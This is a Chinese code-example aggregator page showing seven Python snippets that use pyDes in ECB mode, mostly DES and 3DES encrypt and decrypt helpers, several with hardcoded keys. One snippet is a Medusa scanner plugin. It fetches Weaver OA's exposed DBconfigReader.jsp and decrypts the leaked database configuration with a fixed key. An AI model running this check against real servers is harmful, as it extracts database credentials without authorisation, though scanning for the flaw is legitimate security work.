当前位置: 首页>>代码示例>>Python>>正文


Python pyDes.ECB属性代码示例

本文整理汇总了Python中pyDes.ECB属性的典型用法代码示例。如果您正苦于以下问题:Python pyDes.ECB属性的具体用法?Python pyDes.ECB怎么用?Python pyDes.ECB使用的例子?那么, 这里精选的属性代码示例或许可以为您提供帮助。您也可以进一步了解该属性所在pyDes的用法示例。


在下文中一共展示了pyDes.ECB属性的7个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: main

# 需要导入模块: import pyDes [as 别名]
# 或者: from pyDes import ECB [as 别名]
def main():
    if len(sys.argv) != 2:
        print 'Usage: %s <encrypted_message>'
        sys.exit(-1)

    original_data = sys.argv[1]

    session_key = '%d' % sum([int(c) for c in original_data[:10]])
    key = session_key + 'dksyel'

    encrypted_data = original_data[10:]

    des_cryptor = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
    plaintext = des_cryptor.decrypt(base64.b64decode(encrypted_data))

    print plaintext 
开发者ID:PaloAltoNetworks,项目名称:WireLurkerDetector,代码行数:18,代码来源:decryptor.py

示例2: unobscure

# 需要导入模块: import pyDes [as 别名]
# 或者: from pyDes import ECB [as 别名]
def unobscure(s=""):
    engine = triple_des(salt, ECB, pad=None, padmode=PAD_PKCS5)
    cipher = triple_des(salt)
    decrypted = cipher.decrypt(base64.b64decode(s), padmode=PAD_PKCS5)
    return decrypted.decode() 
开发者ID:GluuFederation,项目名称:community-edition-setup,代码行数:7,代码来源:generate_properties.py

示例3: obscure

# 需要导入模块: import pyDes [as 别名]
# 或者: from pyDes import ECB [as 别名]
def obscure(data, encode_salt):
    engine = triple_des(encode_salt, ECB, pad=None, padmode=PAD_PKCS5)
    data = data.encode('ascii')
    en_data = engine.encrypt(data)
    return base64.b64encode(en_data) 
开发者ID:GluuFederation,项目名称:community-edition-setup,代码行数:7,代码来源:import3031.py

示例4: unobscure

# 需要导入模块: import pyDes [as 别名]
# 或者: from pyDes import ECB [as 别名]
def unobscure(self,s=""):
        engine = pyDes.triple_des(self.key, pyDes.ECB, pad=None, padmode=pyDes.PAD_PKCS5)
        cipher = pyDes.triple_des(self.key)
        decrypted = cipher.decrypt(base64.b64decode(s), padmode=pyDes.PAD_PKCS5)
        return decrypted 
开发者ID:GluuFederation,项目名称:community-edition-setup,代码行数:7,代码来源:import3031.py

示例5: des_encrypt_string

# 需要导入模块: import pyDes [as 别名]
# 或者: from pyDes import ECB [as 别名]
def des_encrypt_string(DEVICE_ID):
    # We only need the first 8 characters of the encryption key
    # Found in co.vmob.sdk.util.Utils.java
    key = 'co.vmob.sdk.android.encrypt.key'.encode()[:8]

    # The encryption prefix
    encryption_prefix = 'co.vmob.android.sdk.'
    # Now the encryption part
    cipher = pyDes.des(key, pyDes.ECB, pad=None, padmode=pyDes.PAD_PKCS5)
    encrypted_message = cipher.encrypt(encryption_prefix + DEVICE_ID)

    # Return the encrypted message base64 encoded and "decoded" so it is a string, not bytes.
    return base64.b64encode(encrypted_message).replace(b"/", b"_").decode() + "_"

# Encryption key used for the TSSA 
开发者ID:freyta,项目名称:7Eleven-Python,代码行数:17,代码来源:functions.py

示例6: medusa

# 需要导入模块: import pyDes [as 别名]
# 或者: from pyDes import ECB [as 别名]
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    proxies=ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/mobile/DBconfigReader.jsp"
        payload_url = scheme + "://" + url +":"+ str(port) + payload

        key = '1z2x3c4v5b6n'[0:8]
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.get(payload_url,headers=headers, timeout=6,proxies=proxies, verify=False)
        con=resp.text
        dec=resp.content[10:]
        resph= resp.headers.get('Set-Cookie')
        code = resp.status_code
        if code == 200 and resp.headers['Content-Type']=='text/html; charset=UTF-8' and resph.find('ecology') != -1 :
            k = pyDes.des(key, pyDes.ECB, '\0' * 8, pad=None, padmode=pyDes.PAD_PKCS5)
            decs=k.decrypt(dec)
            Medusa = "{} 存在泛微OA_数据库配置信息泄露验证数据:\r\nUrl:{}\r\n返回数据:{}\r\n解密数据:{}".format(url,payload_url,con,decs)
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类 
开发者ID:Ascotbe,项目名称:Medusa,代码行数:40,代码来源:WeaverDatabaseConfigurationInformationLeaked.py

示例7: encryptDES_ECB

# 需要导入模块: import pyDes [as 别名]
# 或者: from pyDes import ECB [as 别名]
def encryptDES_ECB(data, key):
    data = data.encode()
    k = pyDes.des(key, pyDes.ECB, IV=None, pad=None, padmode=pyDes.PAD_PKCS5)
    d = k.encrypt(data)
    assert k.decrypt(d, padmode=pyDes.PAD_PKCS5) == data
    return d 
开发者ID:mrknow,项目名称:filmkodi,代码行数:8,代码来源:decryptionUtils.py


注:本文中的pyDes.ECB属性示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。